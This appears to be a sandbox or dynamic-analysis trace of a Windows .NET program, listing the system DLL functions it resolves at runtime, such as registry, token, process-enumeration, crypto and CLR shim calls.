DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
